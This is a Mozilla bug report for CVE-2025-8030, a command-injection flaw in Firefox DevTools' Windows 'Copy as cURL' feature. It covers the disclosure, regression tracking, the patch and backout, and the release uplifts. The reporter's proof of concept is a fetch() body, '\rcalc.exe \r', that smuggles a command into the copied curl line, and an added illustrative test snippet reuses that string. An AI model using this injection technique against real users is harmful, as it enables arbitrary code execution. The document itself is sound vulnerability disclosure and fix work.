Closed Bug 1968414 (CVE-2025-8030) Opened 9 months ago Closed 8 months ago

Copy As Curl[Windows] - Code Execution [Return ie \r in request body]

Categories

(DevTools :: Netmonitor, defect, P2)

Tracking

(firefox-esr115 wontfix, firefox-esr128 141+ fixed, firefox-esr140 141+ fixed, firefox139 wontfix, firefox140 wontfix, firefox141 + fixed, firefox142 + fixed)

RESOLVED FIXED
142 Branch
Tracking Status
firefox-esr115 --- wontfix
firefox-esr128 141+ fixed
firefox-esr140 141+ fixed
firefox139 --- wontfix
firefox140 --- wontfix
firefox141 + fixed
firefox142 + fixed

People

(Reporter: ameenbasha111, Assigned: bomsy)

References

(Blocks 1 open bug, Regression)

Details

(Keywords: regression, reporter-external, sec-moderate, Whiteboard: [client-bounty-form][adv-main141+][adv-ESR140.1+][adv-ESR128.13+])

Attachments

(4 files, 4 obsolete files)

Hi Team, Firefox Nightly latest on Windows is vulnerable to code execution via Copy as cURL (Windows), which allows the attacker to execute code on the victim's machine.

Tested in Nightly Latest 140.0a1 (2025-05-24) (64-bit)

fetch("/", {
  "credentials": "omit",
  "headers": {
    "Accept-Language": "en-US",
    "Content-Type": "text/plain",
  },
  "body": "\rcalc.exe \r",
  "method": "POST",
});

Steps to reproduce

  1. Send the above request directly via the console (or) embed it in HTML
  2. Now from the network tab copy the request as curl (windows)
  3. Paste it in cmd and you can find the calc popup

Root cause: \r wasn't filtered properly

I have reported the same to Chrome and the issue was fixed. I have attached the changeset below; we can adopt the same here too.
https://chromium-review.googlesource.com/c/devtools/devtools-frontend/+/6573473/2/front_end/panels/network/NetworkLogView.ts

I have attached the poc video for reference

Flags: sec-bounty?
Component: Security → Netmonitor
Product: Firefox → DevTools
See Also: → 1950001
Summary: Copy As Curl[Windows] - Code Execution [Return] → Copy As Curl[Windows] - Code Execution [Return ie \r instead of \r\n or \n in request body]
Summary: Copy As Curl[Windows] - Code Execution [Return ie \r instead of \r\n or \n in request body] → Copy As Curl[Windows] - Code Execution [Return ie \r in request body]
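
Added example (not part of the bug report, and not Firefox or Chromium code): the summary history above narrows the trigger to a lone \r rather than \r\n or \n, which is the gap a newline pattern written as \r?\n leaves. The two normalisers, the <EOL> marker and the sample strings are constructed for illustration; the marker stands in for whatever escape sequence a real command builder emits.

```javascript
// Added example, not Firefox or Chromium code. Both normalisers are
// hypothetical, and MARKER is a placeholder rather than a claim about
// what a correct cmd.exe escape sequence looks like.
const MARKER = "<EOL>";

// Models the flaw class: handles \r\n and \n, but a lone \r passes through.
function normaliseMissingCR(s) {
  return s.replace(/\r?\n/g, MARKER);
}

// Covers all three terminator forms. \r\n is listed first so that a CRLF
// pair is replaced once instead of twice.
function normaliseAllTerminators(s) {
  return s.replace(/\r\n|\r|\n/g, MARKER);
}

// Constructed sample bodies; the last one is the body string from the report.
const SAMPLES = [
  ["LF", "a\nb"],
  ["CRLF", "a\r\nb"],
  ["lone CR", "a\rb"],
  ["mixed", "a\r\n\rb\n"],
  ["report body", "\rcalc.exe \r"],
];

// Regression check: returns the labels of the samples whose output still
// contains a raw line terminator after the normaliser has run.
function rawTerminatorsLeft(normalise) {
  const failing = [];
  for (const [label, body] of SAMPLES) {
    if (/[\r\n]/.test(normalise(body))) {
      failing.push(label);
    }
  }
  return failing;
}

console.log("missing-CR pattern:", rawTerminatorsLeft(normaliseMissingCR));
console.log("all terminators:   ", rawTerminatorsLeft(normaliseAllTerminators));
```

A test table like this, run against the real escaping function, would catch the case where only some terminator forms are handled.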

Nicolas can you check if it's a regression from the recent fix on this feature?

Severity: -- → S3
Flags: needinfo?(nchevobbe)
Priority: -- → P2

(In reply to Julian Descottes [:jdescottes] from comment #1)

Nicolas can you check if it's a regression from the recent fix on this feature?

regressed by Bug 1950001

Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: needinfo?(nchevobbe)
Keywords: regression
Regressed by: 1950001

Set release status flags based on info from the regressing bug 1950001

:bomsy, since you are the author of the regressor, bug 1950001, could you take a look?

For more information, please visit BugBot documentation.

Flags: needinfo?(hmanilla)
Keywords: sec-moderate
Comment 3 is private: false
See Also: 1950001

Hi :bomsy, can you look into this case? I have shared the Chrome changeset for this issue in the description.

Hi Bomsy, friendly ping. Any update on this case?

Attached file (secure)
Assignee: nobody → hmanilla
Status: NEW → ASSIGNED
Attachment #9495695 - Attachment description: Bug 1968414 - [devtools] Escape carraige return character properly r=#devtools → Bug 1968414 - [devtools] Escape carriage return character properly r=#devtools
Flags: needinfo?(hmanilla)

Team, any update on this case?

Seems the fix is accepted; can we move this issue to closed, team?

Pushed by hmanilla@mozilla.com: https://github.com/mozilla-firefox/firefox/commit/5dca7e838a6d https://hg.mozilla.org/integration/autoland/rev/77c894b3f3b8 [devtools] Escape carriage return character properly r=devtools-reviewers,nchevobbe
Pushed by agoloman@mozilla.com: https://github.com/mozilla-firefox/firefox/commit/f87e4f401557 https://hg.mozilla.org/integration/autoland/rev/5649df61eae0 Revert "Bug 1968414 - [devtools] Escape carriage return character properly r=devtools-reviewers,nchevobbe" for causing dt failures @browser_net_curl-utils.js.

Backed out for causing dt failures @browser_net_curl-utils.js.

Flags: needinfo?(hmanilla)
Pushed by hmanilla@mozilla.com: https://github.com/mozilla-firefox/firefox/commit/4e38ca024e12 https://hg.mozilla.org/integration/autoland/rev/c2a657f761cb [devtools] Escape carriage return character properly r=devtools-reviewers,nchevobbe
Flags: needinfo?(hmanilla)
Group: firefox-core-security → core-security-release
Status: ASSIGNED → RESOLVED
Closed: 8 months ago
Resolution: --- → FIXED
Target Milestone: --- → 142 Branch

The patch landed in nightly and beta is affected.
:bomsy, is this bug important enough to require an uplift?

For more information, please visit BugBot documentation.

Flags: needinfo?(hmanilla)
Flags: sec-bounty? → sec-bounty+
Attachment #9498571 - Flags: approval-mozilla-beta?

firefox-beta Uplift Approval Request

  • User impact if declined: Broken escape of the curl on windows command
  • Code covered by automated testing: yes
  • Fix verified in Nightly: yes
  • Needs manual QE test: no
  • Steps to reproduce for manual QE testing: None
  • Risk associated with taking this patch: small js fix
  • Explanation of risk level: Low risk
  • String changes made/needed: None
  • Is Android affected?: no
Flags: needinfo?(hmanilla)

Bomsy, we will need uplift requests for ESR branches as well, thanks.

Flags: needinfo?(hmanilla)
Attached file (secure) (obsolete) —
Attachment #9498795 - Flags: approval-mozilla-esr140?
Attached file (secure) (obsolete) —
Attachment #9498797 - Flags: approval-mozilla-esr128?
Flags: needinfo?(hmanilla)
Attachment #9498571 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
Attachment #9498795 - Flags: approval-mozilla-esr140? → approval-mozilla-esr140+
Attachment #9498797 - Flags: approval-mozilla-esr128? → approval-mozilla-esr128+
QA Whiteboard: [sec] [qa-triage-done-c142/b141]
Flags: qe-verify-
Whiteboard: [client-bounty-form] → [client-bounty-form][adv-main141+]
Blocks: curl
Whiteboard: [client-bounty-form][adv-main141+] → [client-bounty-form][adv-main141+][adv-ESR128.13+]
Whiteboard: [client-bounty-form][adv-main141+][adv-ESR128.13+] → [client-bounty-form][adv-main141+][adv-ESR140.1+][adv-ESR128.13+]
Attached file advisory.txt (obsolete) —
Attached file advisory.txt (obsolete) —
Attachment #9500511 - Attachment is obsolete: true
Attached file advisory.txt
Attachment #9500512 - Attachment is obsolete: true
Attachment #9495695 - Attachment description: Bug 1968414 - [devtools] Escape carriage return character properly r=#devtools → (secure)
Alias: CVE-2025-8030
Attachment #9498795 - Attachment is obsolete: true
Attachment #9498797 - Attachment is obsolete: true
Group: core-security-release